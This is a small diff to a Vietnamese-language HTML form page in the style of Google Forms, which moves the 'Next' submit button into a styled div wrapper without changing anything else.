--- a/site_1.html
+++ b/site_1.html
@@ -42,7 +42,10 @@
         <input type="email" id="email" placeholder="Họ và tên" required>
         
     </div>
-    <button type="submit" class="submit-button">Tiếp</button>
+
+    <div  class="submit-button">
+        <button type="submit">Tiếp</button>
+    </div>
     <div class="footer">
         <p>Không bao giờ gửi mật khẩu thông qua biểu mẫu này.</p>
         <p>Nội dung này không phải do Google tạo ra hay xác nhận - 
